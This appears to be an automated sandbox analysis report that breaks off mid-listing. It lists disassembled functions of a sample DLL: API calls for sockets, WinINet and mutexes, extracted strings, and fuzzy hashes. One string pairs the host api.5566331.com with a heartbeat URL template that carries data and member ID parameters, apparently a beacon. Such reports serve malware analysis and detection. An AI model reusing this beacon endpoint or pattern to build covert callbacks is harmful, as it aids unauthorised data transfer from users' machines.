GetProcAddress.KERNEL32(00000000), ref: 100369B3
EncodePointer.KERNEL32(00000000), ref: 100369BF
DecodePointer.KERNEL32(00000001), ref: 100369DC

Strings

combase.dll, xrefs: 100369A7
RoInitialize, xrefs: 1003699B

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 71b1fc28e040eaf9fb3e13536ba312b7f61311651f774241ec39d774eafd6ce0
Instruction ID: 3814e3cd0c3436562688b886f5d7f2b6b7786d732422ae77aefbb8b6c9afc0e6
Opcode Fuzzy Hash: 71b1fc28e040eaf9fb3e13536ba312b7f61311651f774241ec39d774eafd6ce0
Instruction Fuzzy Hash: 9DE01A786943646EFB109F70CCCDB893BEAF704706F50A114F105D50A4EBB480489F01

Function 10036A67 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,10036981), ref: 10036A81
GetProcAddress.KERNEL32(00000000), ref: 10036A88
EncodePointer.KERNEL32(00000000), ref: 10036A93
DecodePointer.KERNEL32(10036981), ref: 10036AAE

Strings

combase.dll, xrefs: 10036A7C
RoUninitialize, xrefs: 10036A70

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 88d59d67b8e18c4a5f04efac5e6e66de678ae815fc03f88b8b85e5a57a505f36
Instruction ID: 257dba45c5b9e5745066ac2a4e5281a1c3e40de3f98b4faded64c9f5e349f13c
Opcode Fuzzy Hash: 88d59d67b8e18c4a5f04efac5e6e66de678ae815fc03f88b8b85e5a57a505f36
Instruction Fuzzy Hash: 6DE0EC78A95660AFFB11DF60CD8CB453BA5F70834AF11C054F509E50A0EFB88418EF11

Function 1002F4D0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 447sleepthreadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 100032F8: _memmove.LIBCMT ref: 100033BD
Part of subcall function 100032F8: _memmove.LIBCMT ref: 100033F4

Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,00000000,00000005,?,?), ref: 1002FA74
PostThreadMessageW.USER32(?,00002B5F,?,?), ref: 1002FAC5
InternetCloseHandle.WININET(00000000), ref: 1002FADD

Strings

https:, xrefs: 1002F646, 1002F7E9
http:, xrefs: 1002F67E, 1002F7A0

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _memmove$CloseHandleInternetMessagePostSleepThread
String ID: http:$https:
API String ID: 1130311992-2714316481
Opcode ID: 76b602ee1412f6029f3ee21f7f8d3848bab4ac05bc113f81b98308526ee9b1b9
Instruction ID: 915af8a31af0a75dffe03e89711a24d46bdad9159a96e45aa538bd49b24774f9
Opcode Fuzzy Hash: 76b602ee1412f6029f3ee21f7f8d3848bab4ac05bc113f81b98308526ee9b1b9
Instruction Fuzzy Hash: 5C127E70508381DFE321CF24D884BABBBE1FF89384F54896DE599872A1DB71A845CB53

Function 10024220 Relevance: 9.1, APIs: 6, Instructions: 128memorynetworkCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 1002427A
_memmove.LIBCMT ref: 100242C5
WSASend.WS2_32(?,00000018,00000001,?,00000000,00000000,00000000), ref: 100242F6
WSAGetLastError.WS2_32 ref: 10024301
InterlockedDecrement.KERNEL32(00000028), ref: 10024318
HeapFree.KERNEL32(?,00000000,00000000,00000000), ref: 10024340

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Heap$AllocDecrementErrorFreeInterlockedLastSend_memmove
String ID:
API String ID: 1113664776-0
Opcode ID: a462f4ac9f8657c021b9b04c58686a58ea80ed4bfa49ce19956673eda0e90089
Instruction ID: 47d4c8ab42c6eea9bfe2ced7c1d785e30afba0d0751f843b89e14ba74dfb26aa
Opcode Fuzzy Hash: a462f4ac9f8657c021b9b04c58686a58ea80ed4bfa49ce19956673eda0e90089
Instruction Fuzzy Hash: F1418E71A0060AEFDB00CFA5D880A9AB7F9FF48314F41462AE915E7640DB70FE54CB90

Function 100221C0 Relevance: 9.1, APIs: 6, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 100251A0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 100251C5
Part of subcall function 100251A0: SwitchToThread.KERNEL32(?,?,?,?,?,1002240E), ref: 100251E9
Part of subcall function 100251A0: Sleep.KERNEL32(00000001,?,?,?,?,?,1002240E), ref: 100251FB

SetLastError.KERNEL32(000010DD), ref: 100222CC

Part of subcall function 10022490: socket.WS2_32(?,00000001,00000006), ref: 100224D7
Part of subcall function 10022490: ioctlsocket.WS2_32(?,8004667E,?), ref: 10022520
Part of subcall function 10022490: bind.WS2_32(?,00000002,0000001C), ref: 10022540
Part of subcall function 10022490: SetLastError.KERNEL32(00000000), ref: 10022551
Part of subcall function 10022490: listen.WS2_32(?,?), ref: 1002256F

CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?,?), ref: 10022255
GetLastError.KERNEL32 ref: 10022262
SetLastError.KERNEL32(00000000), ref: 1002226C
GetLastError.KERNEL32(?,?), ref: 100222AD
SetLastError.KERNEL32(00000000), ref: 100222B8

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLast$CompareCompletionCreateExchangeInterlockedPortSleepSwitchThreadbindioctlsocketlistensocket
String ID:
API String ID: 3008254831-0
Opcode ID: 33d1e1a823e7593172266413c69a16bb33dc59e5c5bd4c6ecac0f9ba098da95f
Instruction ID: 25731126ecceef237b5eadcf649c6642afb87f46824a2e3290a2af4592c0b696
Opcode Fuzzy Hash: 33d1e1a823e7593172266413c69a16bb33dc59e5c5bd4c6ecac0f9ba098da95f
Instruction Fuzzy Hash: DC31AD31604646FFE700DFA5D848BAABBE9FF84750F50422AE811C77C0DB76A814CB90

Function 1001F300 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 10026BA0: GetCurrentThreadId.KERNEL32 ref: 10026BA4

CloseHandle.KERNEL32(?,93656AD3), ref: 1001F34F
CloseHandle.KERNEL32(?,93656AD3), ref: 1001F35C
DeleteCriticalSection.KERNEL32(?,93656AD3), ref: 1001F374
_free.LIBCMT ref: 1001F393
HeapDestroy.KERNEL32(?), ref: 1001F3C1
_free.LIBCMT ref: 1001F3F0

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CloseHandle_free$CriticalCurrentDeleteDestroyHeapSectionThread
String ID:
API String ID: 4172272558-0
Opcode ID: 74966feeee5e55662b9fe9985a96bced8da136f5a641b9baab4b2a3d6fddc39d
Instruction ID: 109e83372a2a65c369b5238d9d2ce49368707bcd3d3f496a78113b41b42a28fc
Opcode Fuzzy Hash: 74966feeee5e55662b9fe9985a96bced8da136f5a641b9baab4b2a3d6fddc39d
Instruction Fuzzy Hash: E0318BB0600745DBDB10CF69C844B9BFBE8FF54304F00461DE4559B690DBB5E948CB90

Function 100255E0 Relevance: 9.1, APIs: 6, Instructions: 85networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 100255F3
WSAAddressToStringA.WS2_32(?,0000001C,00000000,?,?), ref: 1002561C
htons.WS2_32(?), ref: 10025639
StrPBrkA.SHLWAPI(?,1005DEF0), ref: 1002565F
StrChrA.SHLWAPI(?,00000025), ref: 1002566A
_memmove.LIBCMT ref: 1002568C

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: htons$AddressString_memmove
String ID:
API String ID: 2092185379-0
Opcode ID: 5f4a50b4020e0c7fce60411f9dbe05132d6bab3187074c607b9b3e4039f63731
Instruction ID: af4dca52562ec587c4ef2840e7a2834d8e0731805111b03a2ffe6cd1c8dc9911
Opcode Fuzzy Hash: 5f4a50b4020e0c7fce60411f9dbe05132d6bab3187074c607b9b3e4039f63731
Instruction Fuzzy Hash: 2D21D736200356ABEB015FA4EC8CBA677ECEF48356F814026FD05C7150D7B68D81C768

Function 1001544F Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10015454
__time64.LIBCMT ref: 1001547B

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

_rand.LIBCMT ref: 10015488
_rand.LIBCMT ref: 100154A7
_rand.LIBCMT ref: 100154BC
_rand.LIBCMT ref: 100154C9

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _rand$Time$FileH_prologSystem__aulldiv__time64
String ID:
API String ID: 719677733-0
Opcode ID: f7a5117bf611885dd31e75710868ee461aec261d2f3beb21815ee12701733f13
Instruction ID: a88c9a8f57be324bb81784dc804cb620c9220be911630338d4b2a3c06f03dd55
Opcode Fuzzy Hash: f7a5117bf611885dd31e75710868ee461aec261d2f3beb21815ee12701733f13
Instruction Fuzzy Hash: 00114C7ED10520ABC311DBA48C41BDEB3A5EF85666F65451BF825EF141CA79BCC052A0

Function 10005B14 Relevance: 9.1, APIs: 6, Instructions: 57synchronizationCOMMONLIBRARYCODE

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(?,?,?,?,10005AD4), ref: 10005B36
CloseHandle.KERNEL32(?,?,?,?,10005AD4), ref: 10005B3E
ReleaseMutex.KERNEL32(000001FC,?,?,?,10005AD4), ref: 10005B4A
CloseHandle.KERNEL32(?,?,?,10005AD4), ref: 10005B52
ReleaseMutex.KERNEL32(?,?,?,?,10005AD4), ref: 10005B5F
CloseHandle.KERNEL32(?,?,?,?,10005AD4), ref: 10005B67

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CloseHandleMutexRelease
String ID:
API String ID: 4207627910-0
Opcode ID: b1cee3fd7a79e4365a8f61567f12352077ee08b91f758be315278f7aa15c15ab
Instruction ID: c508b5dba44b556361941f415c8e605832dbccd52cfd8276065288f46ee70f95
Opcode Fuzzy Hash: b1cee3fd7a79e4365a8f61567f12352077ee08b91f758be315278f7aa15c15ab
Instruction Fuzzy Hash: 1611FE34101B009BE728EB75CC99EEBB7E9FF44340B41481DE09A87166DB75BA85CB14

Function 1002A650 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 299COMMON

Download Yara Rule

APIs

Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0

_free.LIBCMT ref: 1002A9DA

Part of subcall function 10033888: std::exception::exception.LIBCMT ref: 100338BC
Part of subcall function 10033888: __CxxThrowException@8.LIBCMT ref: 100338D1

_free.LIBCMT ref: 1002AA3D
_free.LIBCMT ref: 1002AA53
_free.LIBCMT ref: 1002AA76

Strings

mid, xrefs: 1002A74C, 1002A76F, 1002A7A1

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _free$Exception@8Throw_mallocstd::exception::exception
String ID: mid
API String ID: 2919663970-1101984974
Opcode ID: 12b17f1f47d9965d1c629af448463cbbb5fa1ce101f2ba63457331677a5339a4
Instruction ID: adf4b229ca35f980d8bca538a1a01f750506ab05ceced394b0d2457890389393
Opcode Fuzzy Hash: 12b17f1f47d9965d1c629af448463cbbb5fa1ce101f2ba63457331677a5339a4
Instruction Fuzzy Hash: 16D136B1D103599EDB21CFA4CC417DEBBB1EF4A300F5042AAE449AB241EB755A89CF91

Function 10041828 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 10041828

Part of subcall function 1003C94F: EncodePointer.KERNEL32(00000000,?,1004182D,100365DC,1005F5F8,00000008), ref: 1003C952
Part of subcall function 1003C94F: __initp_misc_winsig.LIBCMT ref: 1003C973

__mtinitlocks.LIBCMT ref: 1004182D

Part of subcall function 10037A95: InitializeCriticalSectionAndSpinCount.KERNEL32(10065570,00000FA0,?,?,10041832,100365DC,1005F5F8,00000008), ref: 10037AB3

__mtterm.LIBCMT ref: 10041836
__calloc_crt.LIBCMT ref: 1004185B
GetCurrentThreadId.KERNEL32 ref: 10041884

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm
String ID:
API String ID: 1171689812-0
Opcode ID: 16d5ded0de0c11e0ceb996ffb4cfa71e2bcd6a509d528ea8bcd8d02f3c03175c
Instruction ID: 750453ac2fefb3abb05fc6b638d2b9d0fcd8966267f4e72a87cc493a9f650df8
Opcode Fuzzy Hash: 16d5ded0de0c11e0ceb996ffb4cfa71e2bcd6a509d528ea8bcd8d02f3c03175c
Instruction Fuzzy Hash: 01F0CDB67297226DE225E7792C077EB2AC0DF01272F32063EF464D90D2FF11A8018158

Function 1001519A Relevance: 9.0, APIs: 6, Instructions: 34synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,1000EF35,000001C8), ref: 100151AF
GetLastError.KERNEL32 ref: 100151BB
ReleaseMutex.KERNEL32(00000000), ref: 100151C9
CloseHandle.KERNEL32(00000000), ref: 100151D0
ReleaseMutex.KERNEL32(00000000), ref: 100151DA
CloseHandle.KERNEL32(00000000), ref: 100151E1

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Mutex$CloseHandleRelease$CreateErrorLast
String ID:
API String ID: 299056699-0
Opcode ID: f16090332a443110e37fb4a15934dc5cf799fb4b965f6a5998d9995d691f2e92
Instruction ID: 800ce60f158ef0ea3815663d752b036469cae43976e0dcf2657369177bbbfcb0
Opcode Fuzzy Hash: f16090332a443110e37fb4a15934dc5cf799fb4b965f6a5998d9995d691f2e92
Instruction Fuzzy Hash: 06F0FE76401A29FFE7029FB5DC999DE3BACEB15242B048012F9068A111C731DA85CFA5

Function 1002F0F0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 283sleepthreadwindowCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4,?,?,?), ref: 1002F457
PostThreadMessageW.USER32(?,00002B5F,?,?), ref: 1002F496
InternetCloseHandle.WININET(00000010), ref: 1002F4A5

Strings

https:, xrefs: 1002F166, 1002F287
http:, xrefs: 1002F19E, 1002F24B

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CloseHandleInternetMessagePostSleepThread
String ID: http:$https:
API String ID: 3505073871-2714316481
Opcode ID: fd533cb330b2eb47bcd2d1a7aba7961fd34ca8c5aba792ca752c94813477cb6a
Instruction ID: 08bc87893911aea4971000add18b57d5099268f2de168e91a491ab19bf3e696c
Opcode Fuzzy Hash: fd533cb330b2eb47bcd2d1a7aba7961fd34ca8c5aba792ca752c94813477cb6a
Instruction Fuzzy Hash: D1B1AE705083808FE711DF68E884B2BBBE6EF85394F84493DF496872A1D7B1D949CB52

Function 100114D7 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 195COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100114DC
__time64.LIBCMT ref: 100114FD

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

Part of subcall function 10012234: __EH_prolog.LIBCMT ref: 10012239
Part of subcall function 10012234: _free.LIBCMT ref: 100122FF
Part of subcall function 10012234: _free.LIBCMT ref: 10012311

Part of subcall function 1001BE7E: __EH_prolog.LIBCMT ref: 1001BE83
Part of subcall function 1001BE7E: _sprintf.LIBCMT ref: 1001BEF8

Part of subcall function 10003925: _memmove.LIBCMT ref: 10003950

Part of subcall function 100036AE: _memmove.LIBCMT ref: 10003704

Part of subcall function 1001BF99: __EH_prolog.LIBCMT ref: 1001BF9E

_sprintf.LIBCMT ref: 100116C9

Part of subcall function 1000246E: __EH_prolog.LIBCMT ref: 10002473

Strings

/index.php/inface/Heart/index?data=%s&member_id=%s&time=%d, xrefs: 100116C3
api.5566331.com, xrefs: 100116F0

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog$Time_free_memmove_sprintf$FileSystem__aulldiv__time64
String ID: /index.php/inface/Heart/index?data=%s&member_id=%s&time=%d$api.5566331.com
API String ID: 2351994653-2092688287
Opcode ID: 626b145d63955841b4a1afe3d22c751e65f09e0913bd5877de186f72f53edca2
Instruction ID: 883e9699974774e929dbfcc03b4e97d480afeffec36dd8d9086cd3d6d81822b8
Opcode Fuzzy Hash: 626b145d63955841b4a1afe3d22c751e65f09e0913bd5877de186f72f53edca2
Instruction Fuzzy Hash: EF816F75D00158EEDB25DBA4CC91BEDB7B8EF14340F5081AAE40A63146EF706B89CFA1

Function 1001BD49 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001BD4E
_sprintf.LIBCMT ref: 1001BDBB
_sprintf.LIBCMT ref: 1001BDDD

Strings

%s%d%d%d, xrefs: 1001BDD7
